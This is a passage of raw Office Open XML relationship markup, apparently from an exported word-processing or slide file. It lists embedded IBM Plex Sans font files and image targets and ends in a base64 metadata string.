Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular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8.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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4.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54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3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hjr5ynAH1z/2EXucJe0lQ1uIyQA==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmgubHl2ZDhic3k2MmV1Mg5oLm45YnYyczRiMWJ5ODIOaC42dnJvZ29ybTM2cTk4AHIhMVpxcTNWZWxUSFlQeUhjOTY1c1BJQWZtcWNGYTNuX2lx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